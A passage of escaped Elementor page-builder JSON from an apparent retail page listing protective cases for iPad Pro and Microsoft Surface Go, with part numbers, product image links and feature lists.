instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe6de1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6895690\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cac6c51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c724b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"afa9c21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c4b6b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a983d0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0414077\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e27080\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"52a45e3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1748b19\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"24f99b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7472688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e19a656\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d135e68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek <\\/strong><strong>11-inch\\u00a0 <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c5f1a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"94b3c2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74502GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc6acc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9268480\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0e368ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"039f013\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d9e6d7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"77e1d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e079a49\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"192\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8b54b12\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8672d06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d70140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black &amp; Gold<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ce129\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a2e1c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a76315d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c26b89d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a780230\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8102767\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e736638\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e712cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9336132\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3b49729\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f3df92b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6c073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b7d1d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e683a6d\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f005697\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"3c683c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cfc8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch<\\/strong><strong> iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e8d2137\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1467ed2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek\\u2122 <\\/strong><strong>Rotating Case <\\/strong><strong>12.9-inch iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ748GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"44f9857\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e380076\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Classic Case for <\\/strong><strong>12.9-inch <\\/strong><strong>iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ749GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c30185\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4ec1175\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23ccf88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c06e0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30b6c65\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"16573a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"44ec04c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"907f6a3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6718b07\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc7a527\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black, Red &amp; Burgundy<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6601d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27e4cb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design delivers practical protection and enhances stability<\\/li><li>Patented custom-molded tray with reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing<\\/li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"780ec47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb1d3b2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e704695\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"39b318b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"df3be40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba13e6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe249f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"278724c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"027329b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054db58\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6196c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"39f71bf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"208ace1\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"dd3ee9d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"26b4f3b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>12.9-inch\\u00a0<\\/strong><strong> iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ750GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4a121f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"674bee1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>SafePort Rugged <\\/strong><strong>Case for <\\/strong><strong>12.9-inch iPad <\\/strong><strong>(6th gen. \\/ 5th gen.)<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THD138GLZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2bed517\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aae738f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f6a9f2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050377_versavu-signature-series-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Signature Series Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a7759bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c62f212\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/3_THD138GLZ_BACK2_1024x1024.jpg?v=1571711592\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2cb966a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ba550a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6da4bbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4bdd233\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6c9e329\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Heavy duty, shock-absorbing case for the iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch)<\\/li><li>Form-fit TPU shell with USA Military-Spec drop protection \\u2013 protects your device from 1.2m\\/4ft drops<\\/li><li>Offers rugged protection in a slim, professional-looking case<\\/li><li>Sound enhancing scoops for all iPad speakers<\\/li><li>Integrated stand for stable viewing and comfortable typing<\\/li><li>Optional detachable shoulder strap (THA101GLZ)<\\/li><li>Compatible with the ambient light sensor and mic on your device<\\/li><li>Clear window on back to display asset tag<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b71a0e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26da7ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7094b67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c542f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3243ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d729ea6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"60d35e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84813a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46d1844\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5da049f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ac39cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Protect Case for Microsoft Surface\\u2122 Go<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ779GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f231dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"db2432a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Protect Case for Microsoft Surface\\u2122 Go<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THD491GLZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8dc8da\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1953aa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ac8efa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ779GL_11_PEN2_1024x1024.jpg?v=1571711592\\\" width=\\\"193\\\" height=\\\"193\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"398b7f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2b1f7b7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THD491GL_20_USE4_1024x1024.jpg?v=1571711592\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b76d24\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"84599d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b02e1d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Case passes military grade 4\\u2019 drop testing (MIL-STD 810G)*<\\/li><li>Hard-moulded tray with durable kickstand<\\/li><li>Advanced corner protection with shock-absorbent TPU<\\/li><li>Non-slip interior for infinite viewing angles<\\/li><li>Integrated Surface Pen holder (pen not included)<\\/li><li>Compatible with Surface Type Cover<\\/li><li>Compatible with Surface Dock<\\/li><li>Full access to camera and ports<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"56f840c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"829e6ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Case passes military grade 4\\u2019 drop testing (MIL-STD 810G)*<\\/li><li>Hard-moulded tray with durable kickstand<\\/li><li>Advanced corner protection with shock-absorbent TPU<\\/li><li>Keyboard locking feature helps prevent accidental disconnects (keyboard not included)<\\/li><li>Detachable hand strap (included) and integrated Surface Pen holder (pen not included)<\\/li><li>Compatible with Surface Type Cover<\\/li><li>Compatible with Surface Dock<\\/li><li>Full access to camera and ports<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6b2856\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33e8d3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d4063c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ef704\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"61e6c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da0626d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a354cbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8006a3f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2cda527\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"12faef0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3eb43c0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy 